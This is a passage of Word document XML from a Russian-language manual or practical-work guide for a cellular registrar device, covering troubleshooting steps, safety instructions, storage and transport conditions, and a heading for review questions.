              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Проверить уровень сигнала сети с помощью светодиода </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Net</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Подключить</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>антенну.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Перенести антенну устройства в зону уверенного приема.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Заменить</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>абонентский телефон.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1266"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2519" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Невозможно подключиться</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>к сети Интернет</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1. Неправильные настройки модема.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3590" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>1. Провести повторную настройку модема согласно инструкции.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_TOC_250004"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>Инструкция по технике</w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>безопасности</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Особое внимание уделяйте приведенным ниже инструкциям по технике безопасности:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1429"/>
          <w:tab w:val="left" w:pos="6342"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">избегайте   попадания </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="69"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">пыли, </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="74"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>грязи</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:tab/>
        <w:t>и мусора на внешние разъемы регистратора;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1363"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>не допускайте механических воздействий на регистратор,  способных его</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>повредить;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1309"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>не допускайте пролива жидкости на</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>регистратор;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1309"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:lastRenderedPageBreak/>
        <w:t>не пытайтесь самостоятельно разбирать</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>регистратор;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1418"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>не задевайте пальцами или металлическими предметами контакты телефонного разъема. Это может привести к поражению электрическим током или к выходу из строя</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>регистратора;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1313"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>применяйте поставляемый в комплекте блок питания. Если применение комплектного блока питания невозможно, используйте блоки питания только с рекомендованными характеристиками и соблюдением  полярности  – центральный вывод разъема должен быть</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>«+»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1309"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>отключайте блок питания от сети, если регистратор не</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>используется;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1309"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:t>не включайте блок питания в сеть в случае его</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>повреждения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1367"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">не </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">используйте регистратор </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">во </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">влажных </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve">помещениях, </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">относительной влажностью воздуха более </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">85% </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">случае отсутствия </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">резких </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">перепадов </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve">температуры, </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">либо более </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">60% </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">при резких </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">перепадах температуры (более </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:t>°С в</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-39"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>час).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Несоблюдение вышеуказанных требований может привести к отказу устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009576B9" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_TOC_250003"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>Хранение и</w:t>
      </w:r>
      <w:r w:rsidRPr="009576B9">
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidRPr="009576B9">
        <w:t>транспортировка</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Сотовый регистраторы подлежат хранению в заводской упаковке, в закрытых помещениях при колебаниях температуры от –50 °С до +50 °С, относительной влажности воздуха до 90%.</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В помещении для хранения не должно быть паров кислот, щелочей, агрессивных газов и других вредных примесей, вызывающих</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="58"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>коррозию.</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Транспортировка осуществляется в плотно закрытой картонной таре любым видом транспорта закрытого типа.</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В процессе транспортировки и хранения не допускается контакт изделия    с</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>жидкостью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="009165A2" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Контрольные вопросы для защиты практической работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
